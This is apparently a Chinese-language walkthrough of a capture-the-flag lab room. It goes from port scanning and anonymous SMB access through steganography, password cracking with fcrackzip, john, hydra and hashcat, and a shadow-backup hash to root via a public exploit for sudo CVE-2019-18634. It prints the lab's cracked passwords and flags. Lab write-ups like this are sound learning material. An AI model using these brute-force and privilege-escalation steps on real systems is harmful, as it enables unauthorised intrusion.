端口扫描

sudo nmap --min-rate 10000 -p- 10.10.2.67     
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-10 14:47 UTC
Nmap scan report for 10.10.2.67
Host is up (0.24s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
sudo nmap -sT -sV -sC -O -p22,139,445 10.10.2.67
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-10 14:49 UTC
Nmap scan report for 10.10.2.67
Host is up (0.24s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 21:ee:30:4f:f8:f7:9f:32:6e:42:95:f2:1a:1a:04:d3 (RSA)
|   256 dc:fc:de:d6:ec:43:61:00:54:9b:7c:40:1e:8f:52:c4 (ECDSA)
|_  256 12:81:25:6e:08:64:f6:ef:f5:0c:58:71:18:38:a5:c6 (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open              Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (95%), Linux 3.16 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 3.11 (92%), Linux 3.18 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: UBUNTU; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: cherryblossom
|   NetBIOS computer name: UBUNTU\x00
|   Domain name: \x00
|   FQDN: cherryblossom
|_  System time: 2023-10-10T15:49:27+01:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -20m00s, deviation: 34m38s, median: -1s
| smb2-time: 
|   date: 2023-10-10T14:49:28
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.79 seconds

开启了22和SMB服务

SMB

smbclient -L cherry.thm

发现一个Anonymous共享

smbclient \\\\cherry.thm\\Anonymous

可以不需要密码直接登录

发现一个journal.txt,GET的时候发现超时,那就添加超时时间

smbclient \\\\cherry.thm\\Anonymous -t 500

GET了好久终于好了,看了一眼内容,也难怪会超时了(

Steg

一眼base64

cat journal.txt|base64 -d >journal
file journal

发现是PNG图片,正好房间也给出了隐写的提示

mv journal journal.png
pip install stegpy

使用stegpy,支持png的隐写

stegpy journal.png

得到了一个ZIP,但是解压的时候发现文件损坏,用010editor打开发现文件头被改成了jpg的,改成ZIP的504B0301,解压还提示要密码

fcrackzip -uDp /usr/share/wordlists/rockyou.txt _journal.zip

选用老外喜欢的rockyou

得到密码:september

file Journal.ctz

鉴定为7zip?又有密码,套娃是吧

mv Journal.ctz Journal.7z
7z2john Journal.7z >hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

得到密码:tigerlily

是一个XML日志?用cherrytree可以以人性化的格式来打开它,有几篇小作文233

在最底下能找到第一个flag

THM{054a8f1db7618f8f6a41a0b3349baa11}

Getshell

在日志中提到cherry-blossom.list,把保存下来

hydra -l lily -P cherry-blossom.list ssh://cherry.thm

爆破SSH(也只有这条路了),用户名应该是lily,爆出来密码是Mr.$un$hin3

横向移动

发现还有一个johan用户

似乎没有什么东西,上传一个linpeas好了

发现一个shadow备份/var/backups/shadow.bak

直接copyjohan的哈希,然后用之前那个字典爆破

echo '$6$zV7zbU1b$FomT/aM2UMXqNnqspi57K/hHBG8DkyACiV6ykYmxsZG.vLALyf7kjsqYjwW391j1bue2/.SVm91uno5DUX7ob0' >hash

https://hashcat.net/wiki/doku.php?id=example_hashes

查看哈希类型,hashID1800

hashcat -m 1800 -a 0 hash cherry-blossom.list

得到密码:##scuffleboo##

切换为johan

第二个flag

THM{cb064113d54e24dc84f26b1f63bf3098}

提权

sudo本身存在漏洞,emm但是直接搜版本号得到的exp好像不太能用。官方做法是当我们输入sudo -l然后输入密码时,密码会显示星号

涉及到的是CVE-2019-18634,貌似是存在缓冲区溢出,唉不懂。

https://github.com/saleemrashid/sudo-cve-2019-18634

gcc -static -o exp exploit.c

在kali中编译好上传

chmod +x exp

./exp执行

提权成功

roo.txt

THM{d4b5e228a567288d12e301f2f0bf5be0}